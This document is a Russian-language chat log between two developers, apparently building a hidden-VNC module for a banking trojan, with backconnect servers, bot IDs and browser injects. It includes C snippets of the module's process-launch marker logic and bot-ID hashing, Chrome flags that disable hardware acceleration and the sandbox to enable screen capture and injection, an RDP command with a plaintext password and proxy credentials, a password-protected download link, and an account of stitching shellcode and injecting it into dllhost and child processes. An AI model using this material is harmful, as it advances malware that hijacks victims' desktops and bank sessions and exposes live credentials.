[12.08.21 18:14:51] jaime:		Привет.
[12.08.21 18:14:58] grem:		привет
[12.08.21 18:15:28] jaime:		Можешь обрисовать ситуацию с vnc и инжектом? :) Что там за переменную окружения нужно чекать? :)
[12.08.21 18:22:08] grem:		Там при инициализации настроек задается имя переменной окружения
Перед запуском дочернего процесса создается переменная окружения с указанным при старте именем и после запуска удаляется
```
if (!WithBot)
        {
                SetEnvironmentVariableA(g_VncVar.VncPack->Config.HDeskEnv, "true");
        }
        

        Status = CreateProcessA(0, CmdLine, 0, 0, 0, CREATE_SUSPENDED, 0, 0, &si, &pi);
        if (!WithBot)
        {
                SetEnvironmentVariableA(g_VncVar.VncPack->Config.HDeskEnv, 0);
        }

```
[12.08.21 18:43:46] jaime:		А как мне получить имя переменной?
[12.08.21 18:47:17] jaime:		У меня через Start имя не передается, только имя модуля и конфига
[12.08.21 18:48:17] grem:		я по не знанию ip-машины в качестве переменной окружения поставил, cesar возможно это поведение уже изменил, но не факт.
в общем, нужно определиться с именем или может быть его чем-то генерить и с бэкконнекта слать
[12.08.21 18:49:38] jaime:		В общем если некаая переменная окружения установлена, я игнорирую проверку имени десктопа? Пока я что не доганяю в чем проблема :)
[12.08.21 18:52:30] jaime:		Цезаря уже не видно, не проконсултироваться
[16.08.21 10:20:16] jaime:		Привет.
[16.08.21 10:20:26] grem:		привет
[16.08.21 10:20:39] jaime:		Помоги пожалуйста с подключеним по vnc :)
[16.08.21 10:21:49] jaime:		xfreerdp /u:administrator /p:XOge1FTv /w:1366 /h:768  /proxy:http://9CF0EF54:D41EE85C@45.89.106.78:8082/ /v:45.89.106.78:8083
[16.08.21 10:22:14] jaime:		Указываю прокси с авторизацией и  ip для подключения
[16.08.21 10:22:40] jaime:		Телнет к прокси не подключается соразу отлуп
[16.08.21 10:22:44] grem:		адрес странички с параметрами какой?
а то я не знаю как там сделали, но веб апи у backconnect отображает адрес машины, на которой развернут модуль и логин с паролями
[16.08.21 10:23:09] jaime:		195.123.212.155 был такой
[16.08.21 10:23:30] grem:		195.123.212.155 - этот ip и нужно указывать
[16.08.21 10:23:41] grem:		на нем backconnect был развернут
[16.08.21 10:23:55] jaime:		А прокси он же?
[16.08.21 10:24:14] grem:		вряд ли
[16.08.21 10:32:24] jaime:		Можешь подключиться к боту 1230978706 ?
[16.08.21 10:33:48] jaime:		Какое имя пользователя?
[16.08.21 10:34:11] jaime:		Авторизация на прокси проходит
[16.08.21 10:36:55] grem:		имя пользователя при коннекте напрямую?
[16.08.21 10:37:24] grem:		там только отдельный пароль указывается
[16.08.21 10:39:37] jaime:		Так какой клиент рекомендуешь? Давай по шагам. :)
[16.08.21 10:43:01] grem:		Тут не подскажу.
Автор советует использовать UltraVNC и RealVNC, еще TightVNC, но он вроде как медленный
И еще есть вариант развернуть веб-панель NoVNC, я полагаю те у кого взяли исходники его и использовали в основном.
[16.08.21 10:54:46] jaime:		Поставил TightVNC
[16.08.21 10:54:57] jaime:		Там из подключения только IP и порт
[16.08.21 10:56:17] grem:		под *nix еще был TigerVNC
не знаю какой лучше-хуже
[16.08.21 10:56:58] jaime:		А прокси вообще нужен? Могу сразу подключаться на  IP  порт?
[16.08.21 10:58:33] grem:		наверно безопасней будет через соксы, а так можно напрямую на порт 8083 подключаться
[16.08.21 11:20:53] jaime:		Схлопывается viewer, подключается авторизация проходит и все закрывается
[16.08.21 11:37:22] grem:		может проблема в самом вьюере?
Есть realVNC для linux
https://www.realvnc.com/en/connect/download/viewer/linux/
Там только есть нюанс, нужно параметр Color выставлять в rgb888
[16.08.21 12:00:28] jaime:		О вот за это спасибо. :) заработало
[16.08.21 14:16:56] jaime:		А как запускается хром под vnc?
[16.08.21 14:17:20] jaime:		У меня идет ругань на тему --no-sandbox хотя я такие ключики не выставляю
[16.08.21 14:19:12] grem:		я что-то даже это не проверил
с ключами наверно запускается
[16.08.21 14:24:52] jaime:		Я его даже из командной строчки запускаю а все равно ключик откуда то берется
[16.08.21 14:38:02] grem:		по ходу перехватывает запуск процесса хуком и запускает с ключами
[16.08.21 15:37:48] jaime:		А кто перехватывает?
[16.08.21 15:37:56] jaime:		У меня ничего не работает. :)
[16.08.21 15:38:16] jaime:		Не могу проинжектиться в процесс хрома запущенный под vnc
[16.08.21 15:39:48] grem:		vnc
[16.08.21 15:40:54] jaime:		Убиваю хром и запускаю его с нужными ключиками.
[16.08.21 15:41:18] jaime:		Но он запускается не на том дестктопе
[16.08.21 15:41:52] jaime:		Если я сохраняю параметры десктопа и запсуаю на том на котором убивал, то ничего не видно.
[16.08.21 15:43:54] grem:		vnc запускает chrome с ключами отключающими аппаратное ускорение, иначе грабить пиксели с окошка не получиться.
[16.08.21 15:44:17] jaime:		А я там запрещаю кучу протоколов :)
[16.08.21 15:45:31] grem:		```
--ash-force-desktop --disable-3d-apis --disable-accelerated-layers
--disable-accelerated-plugins --disable-audio --disable-gpu --disable-d3d11
--disable-accelerated-2d-canvas --disable-deadline-scheduling --disable-ui-deadline-scheduling
 --aura-no-shadows --no-sandbox --no-zygote
```
[16.08.21 15:47:39] jaime:		А я еще вот это добавляю --disable-http2 --use-spdy=off --disable-quic --enable-logging --log-level=0
[16.08.21 15:51:02] jaime:		Это нормальное имя десткопа {F1D94A6B-2B17-D98C-0C92-E4282A15E079}?
[16.08.21 16:31:39] grem:		--no-sandbox на инжекты не влияет?
[16.08.21 17:17:57] jaime:		Не должно. Вообще все очень странно
[16.08.21 17:18:03] jaime:		Ничего не понимаю
[30.08.21 12:45:38] jaime:		Привет.
[30.08.21 12:46:02] jaime:		По vnc это к тебе? :)
[01.09.21 12:29:41] jaime:		Привет. :)
[01.09.21 12:32:35] grem:		привет
[01.09.21 12:44:19] jaime:		Тебе суть проблемы ясна? Если предложишь решение на моей стороне,  попробую сделать, что то в голову ничего не пришло.
[01.09.21 12:44:52] jaime:		Я для инжекта перезапускаю браузер добавляя нужные ключики в командную строку.
[01.09.21 12:45:26] jaime:		Видимо процесс меняет PID и vnc его не убивает
[01.09.21 12:46:21] grem:		vnc вроде не хранит pid
[01.09.21 12:46:21] jaime:		Можно сразу запускать с нужными ключиками прямо из vnc, тогда я могу его не трогать
[01.09.21 12:47:12] jaime:		А как он завершает хром? По командной строке? Я зашел по HDESK запустил хром, какой хром он убъет при закрытии?
[01.09.21 12:47:54] jaime:		Я посмотрю что ключики нужные для меня имеются и не буду его трогать.
[01.09.21 12:48:32] jaime:		Хотя хреново что если мне ключики нужно будет поменять то две проги придется пересобирать
[01.09.21 13:22:00] grem:		там модуль vnc инжектит в процесс сам себя и создает ивент при срабатывании которого текущий процесс убивается
[01.09.21 13:26:10] jaime:		И как быть?
[01.09.21 13:27:23] jaime:		У меня висит монитор процессов, вижу хром убиваю, перезапускаю с нужными ключиками и инжектеюсь :) А ну еще запускаю на том декстопе на котром я его убивал
[01.09.21 13:28:33] jaime:		Тогда вижу только вариант, что ты запускаешь с нужными мне ключиками, и я не трагаю его если ключики уже есть.
[01.09.21 13:31:38] grem:		Ключики наверно изменить
В старом vnc просто все процессы браузера убивались перед запуском нового
[01.09.21 13:37:09] jaime:		Мне нужны вот эти --disable-http2 --use-spdy=off --disable-quic
[01.09.21 13:37:32] jaime:		Давай если их вижу тогда не трогаю
[02.09.21 08:04:33] jaime:		Привет.
[02.09.21 08:04:51] jaime:		Не добавил ключики в новый релиз?
[02.09.21 08:04:59] grem:		привет
[02.09.21 08:05:12] grem:		в релиз для bk добавил
[02.09.21 08:05:51] grem:		а для трика надо подождать когда cesar обновит
[02.09.21 08:06:06] jaime:		А могу как нибудь локально проверить?
[02.09.21 08:07:46] grem:		только модуль нужен? или backconnect тоже?
[02.09.21 08:08:27] jaime:		Хочу на виртуалке запустить и к нему подцепиться vnc. Это возможно?
[02.09.21 08:10:11] grem:		тогда нужны виртуалка с виндой для модуля и виртуалка с линуксом для бэкконнекта
[02.09.21 08:10:37] jaime:		Ну в принципе все есть
[02.09.21 08:14:05] jaime:		А ты Цезарю уже закинул обнову? Могу в принципе подождать и уже с трика посмотреть
[02.09.21 08:19:59] grem:		```
Download: https://qaz.im/load/aTyEbk/nythBZ
Delete: https://qaz.im/index.php?a=delete&q=1982650069
Password: x^394rYi2RnEm452
```
[02.09.21 08:20:50] grem:		бэкконнект нужно собирать из исходников
[02.09.21 08:21:10] grem:		> А ты Цезарю уже закинул обнову?
да
[02.09.21 08:39:03] jaime:		Спасибо. Забрал
[02.09.21 14:58:07] grem:		я еще забыл сказать
там для бэкконнекта перед установкой нужно скачать GeoLite2-City.mmdb
в архиве пустая заглучшка вместо него.
[02.09.21 15:12:18] jaime:		Ага спасибо
[02.09.21 15:12:25] jaime:		Я через трика смотрю
[02.09.21 15:12:36] jaime:		У меня в 7 какие то траблы
[02.09.21 15:12:50] jaime:		Не отрисовывается хром
[02.09.21 15:13:09] jaime:		Процесс запускается но под vnc  ничего нет
[02.09.21 15:14:55] jaime:		С 10 все отлично. C модулем то же
[02.09.21 15:15:29] jaime:		Под 7 почему то один раз отрисовалось потом нет
[17.09.21 14:35:27] grem:		привет
[17.09.21 14:35:38] jaime:		Привет!
[17.09.21 14:35:59] jaime:		Читал на канале пожелания клиента? :)
[17.09.21 14:36:58] jaime:		Есть у тебя возможность отличить в каком режиме запущено приложение?
[17.09.21 14:38:01] grem:		Да
Я уже как-то писал о таком куске кода:
```
if (!WithBot)
        {
                SetEnvironmentVariableA(g_VncVar.VncPack->Config.HDeskEnv, "true");
        }
        

        Status = CreateProcessA(0, CmdLine, 0, 0, 0, CREATE_SUSPENDED, 0, 0, &si, &pi);
        if (!WithBot)
        {
                SetEnvironmentVariableA(g_VncVar.VncPack->Config.HDeskEnv, 0);
        }
```
то есть нужно прочитать с какими переменными среды был запущен процесс
[17.09.21 14:39:21] jaime:		Да это я видел. А какое имя переменной? Config.HDeskEnv?
[17.09.21 14:40:42] grem:		в последнем модуле для трика сейчас hold, а для bk - test
[17.09.21 14:41:45] grem:		а в первых сборках был ip машины
[17.09.21 14:42:57] grem:		но вообще на счет трика спроси наверняка у cesar
[17.09.21 14:43:53] jaime:		Там 3 режима HDESK, обычный, TMP и БОТ. По hold я пойму что под тобой запущен, а как мне узнать БОТ, TMP или протсо HDESK ?
[17.09.21 14:45:19] jaime:		WithBot - вот это как раз для Бота флажок?
[17.09.21 14:48:02] jaime:		Если установлена переменная огружения hold или с IP, то это запуск HDESK или HDESK TMP?
[17.09.21 14:48:15] grem:		видимо да
есть еще такой кусок:
```
if (Param->WithBot)
        {
                char    VarName[24];

                wsprintfA(VarName, "v%u", Param->BotId);

                SetEnvironmentVariableA(VarName, 0);
        }
```
там хэш id бота в качесве переменной среды используется
[17.09.21 14:49:53] jaime:		Ага понял спасибо. Посмотрю. :)
[17.09.21 15:02:01] grem:		Хэш считается так:
```
#define FNV_32_PRIME    0x01000193

DWORD Hash_FNV1a(IN char* Str)
{
        DWORD Hash = 0x811c9dc5;

        while (*Str)
        {
                Hash ^= (DWORD)*Str++;
                Hash *= FNV_32_PRIME;
        }

        return Hash;
}
```
[17.09.21 15:13:51] jaime:		lock вижу, а вот хеша нет
[17.09.21 15:14:36] jaime:		hold
[17.09.21 15:17:07] jaime:		hold, не будет достаточно, как раз то что нужно. стоит там где не нужно работать
[03.11.21 08:40:38] grem:		привет
[03.11.21 08:40:45] jaime:		Привет. :)
[03.11.21 08:41:38] jaime:		Такой вопрос вчера Робин давал пару ссылок на доступ, там в hdesk не выставлялась переменная hold=true, смотрел в cmd
[03.11.21 08:41:48] jaime:		Не знаешь что могло случиться?
[03.11.21 08:42:02] jaime:		Сейчас к сожалению не работает доступ
[03.11.21 08:42:39] grem:		нет
[03.11.21 08:43:32] jaime:		У него инжекты полезли в hdesk. Windows 10 был обычный
[03.11.21 08:48:01] grem:		то есть проблема именно в модуле для трика?
а у cesar спрашивал? 
может он что-нибудь менял?
Просто делали обновление с рандомизацией прокладок, может еще что-то поменяли
[03.11.21 08:48:50] jaime:		Да в модуле для трика. Нет вчера не спрашивал, поздно было.
[03.11.21 08:51:14] jaime:		Можешь глянуть? Есть vnc
[03.11.21 08:51:52] grem:		у cesar копия исходников, за сборки для трика по сути отвечает он
[03.11.21 08:52:20] jaime:		О как! :)
[11.11.21 09:09:54] grem:		привет
[11.11.21 09:09:59] jaime:		Привет! :)
[11.11.21 09:10:47] jaime:		А не подскажешь что там с vnс в гите? Вижу чистый проект! :)
[11.11.21 09:11:02] jaime:		При клонировании 403
[11.11.21 09:11:08] grem:		совсем чистый?
[11.11.21 09:11:16] jaime:		Ага! :)
[11.11.21 09:12:02] jaime:		Может из-за 403?
[11.11.21 09:12:03] grem:		сейчас роль повысил
[11.11.21 09:12:46] jaime:		О все стало ок!
[11.11.21 09:13:12] jaime:		Видать либо глючило, либо еще не прописалось
[11.11.21 09:14:16] grem:		нет, я просто ставил роль guest, видимо ему практически ничего не доступно.
сменил на developer.
[11.11.21 09:33:03] jaime:		А можешь добавить либухи из darkcatvnc\VNC\src\LIB у меня ntdll-64.lib а вот dxguid-64.lib нету
[11.11.21 09:34:20] grem:		я возможно не все в git залил, надо проверить как собирается
[11.11.21 09:35:21] jaime:		Не все ок
[11.11.21 09:35:28] jaime:		на линковке ошибка
[11.11.21 09:36:58] jaime:		ты  lib_sock.c не модифицировал?
[11.11.21 09:37:32] grem:		вроде нет
[11.11.21 09:38:48] jaime:		закомить plz  ntdll-64.lib и dxguid-64.lib :)
[11.11.21 09:41:05] grem:		все закоммитил
[11.11.21 09:55:46] jaime:		еще тебя отвлеку. :) а есть какой нибудь лоадер для этой dll ки?
[11.11.21 09:56:10] jaime:		Подключиться можно же только через сервер?
[11.11.21 09:57:53] grem:		лоадер я от старого VNC переделал, лежит в StartVNCSRV
а для подключения нужно бэкконнект собирать под линуксом
[11.11.21 09:58:19] jaime:		ага так я и понял :)
[11.11.21 10:29:14] jaime:		Лоадер грузит dllку. Я выпадаю в VncEntry, в аргументах мусор. Что то не так собрал?
[11.11.21 10:37:20] grem:		ты сейчас собираешь отладочную версию?
[11.11.21 10:37:48] jaime:		ага
[11.11.21 10:38:50] jaime:		Есть Debug, Релиз и Test
[11.11.21 10:39:33] grem:		вообще мы иногда забывали копировать заголовок
и там еще сейчас из сборки убраны vnc_data_dbg.c
то есть если берешь отладочные файлы их нужно переименовывать
[11.11.21 10:39:47] jaime:		Не нашел exportа Control, Start и прочего.
[11.11.21 10:40:22] grem:		ты какой профиль собирал?
[11.11.21 10:40:40] jaime:		Я в loader поменял имя на vnc_64_dbg.dll по пути сборки vnc
[11.11.21 10:40:52] jaime:		Я собирал debug
[11.11.21 10:41:13] jaime:		Там и есть точка входа VncEntry
[11.11.21 10:41:43] jaime:		При вызове LoadLibrary попадаю в VncEntry
[11.11.21 10:41:57] jaime:		Как будто я собрал VNC не под трика
[11.11.21 10:42:31] grem:		ты прочитал readme.txt?
[11.11.21 10:43:01] jaime:		да читал
[11.11.21 10:43:54] grem:		ты подгружаешь dll из tmp что ли?
[11.11.21 10:45:16] jaime:		Ага. Понял. :)
[11.11.21 10:48:21] grem:		ты в начале собираешь загрузчик шеллкода и основную логику vnc для обоих архитектур.
эти 4модуля с трамплинами сшиваются в массив с трамплинами пустым пространством для настроек в начале.
На выходе ты берешь 2 файла vnc_data.c/.h и с ними уже собираешь рабочий модуль
[11.11.21 10:49:28] grem:		все испортил
[11.11.21 10:50:11] jaime:		Не все ок! :)
[11.11.21 10:52:41] jaime:		А что в config.txt нужно? :)
[11.11.21 10:53:09] grem:		ip-адрес бэкконнекта
[11.11.21 10:53:28] grem:		ну или прокладок
[11.11.21 11:54:41] jaime:		А как ты дебажишь?
[11.11.21 11:54:41] jaime:		Ведь неудобно
[11.11.21 11:57:51] grem:		я просто вывод в лог смотрю обычно
ну и для vnc можно debugview++ использовать
[11.11.21 12:03:44] grem:		плюс пока никаких значительных изменений не вносили, пока большинство изменений вносил cesar.
[11.11.21 13:56:43] jaime:		Я собрал все в один, отказался от упаковки этого кода. Можно все в студии задебажить.
[11.11.21 13:57:27] jaime:		Есть вопросы HookType == VNC_ENTRY_HOOK_NONE что это такое? Для чего нужно!
[11.11.21 13:57:53] jaime:		VncPack->Config.VncPid что вот тут передать?
[11.11.21 13:58:14] jaime:		ну и наверное все! :)
[11.11.21 14:00:06] jaime:		Мне не нравится в lib_sock блокируемые connect и rcv, мне кажется могут быть проблемы из-за нестабильныз прокладок
[11.11.21 14:05:09] grem:		там же сшивается скриптом 4модуля в один массив
первые 24байта - трамплины для x86/x64 на нужный загрузчик
последующие 100 под настройки и далее бинарники.
в основном модуле мы все нужные настройки передаем в этот массив и запускаем как шеллкод, в последствии этот массив в памяти перемещается, когда мы коннектимся с vncviewer, этот массив инжектится в новый процесс dllhost с другими настройками, а при запуске любых дочерних процессов, так же в них инжектится с третьими настройками.
[11.11.21 14:06:41] grem:		хуки там ставятся, чтобы блокировать запуск некоторых dll и вызов некоторых функций.
[11.11.21 14:07:08] jaime:		Хуки не обязательны?
[11.11.21 14:07:50] grem:		они по идее для браузеров в основном
[11.11.21 14:09:07] grem:		ну и там для wow64 какие-то хаки
[12.11.21 09:46:25] jaime:		Привет.
[12.11.21 09:46:54] jaime:		Првет!
[12.11.21 09:47:04] grem:		привет
[12.11.21 09:47:28] jaime:		Не подскажешь как собрать модуль для бк? Он же просто через rundll должен запускаться?
[12.11.21 09:48:46] grem:		а я все в readme.txt расписал, там отдельные профили сборки, или нет их?
> Он же просто через rundll должен запускаться?
да
[12.11.21 09:50:43] jaime:		Ага нашел, не там смотрел. Понял смапсибо. :)
[12.11.21 09:50:49] jaime:		спасибо
[12.11.21 10:36:12] jaime:		У солюшина нет почему то таких профилей, а у проекта есть
[12.11.21 10:36:58] grem:		я .sln не обновлял
[16.11.21 09:04:09] jaime:		Привет.
[16.11.21 09:26:58] grem:		привет
[16.11.21 09:32:00] jaime:		Я добавил настройку порта хостов. Давай я в отдельную ветку закомичу, ты отресерчишь, и если понравиться смержишь в основную ветку? :)
[16.11.21 09:33:28] grem:		я не против
[16.11.21 09:34:00] jaime:		Там буквально пару файлов, если ничего не задавать то все будет по старому.
[16.11.21 09:34:05] jaime:		Сейчас организую
[16.11.21 09:42:09] jaime:		Сделал ветку jaime_research там 3 файла изменено, entry.h, entry.c и proto_bc.c
[16.11.21 11:38:33] grem:		Ты еще фикс для ubuntu залил?
Там форматирование поменялось?
[16.11.21 12:03:15] grem:		переписал немного парсер
[16.11.21 13:11:54] jaime:		отлично
[16.11.21 13:12:37] jaime:		да отдельный коммит для ubuntu, я сменил переводы строки на unux стайл везде
[16.11.21 13:15:42] jaime:		Добавил automake, autoconf и там пофиксил по мелочи, думаю можно не мержить. Там по существу ничего нет. Если только Makefile.am, src/Makefile.am, bootstrap, configure.ac перенести в основную ветку их там нет. Остальное пофиг
[31.12.21 07:54:31] jaime:		Привет! С Наступающим новым годом тебя! :) Я там несколько изменений по vncсерверу добавил, в частности сборку через докер. Отмрержишь> :) можно даже не в этом году! :)
[31.12.21 07:55:28] grem:		привет
[31.12.21 07:55:32] grem:		ок
[31.12.21 07:55:52] grem:		и тебя с наступающим
[31.12.21 07:56:05] jaime:		:) спасибо!
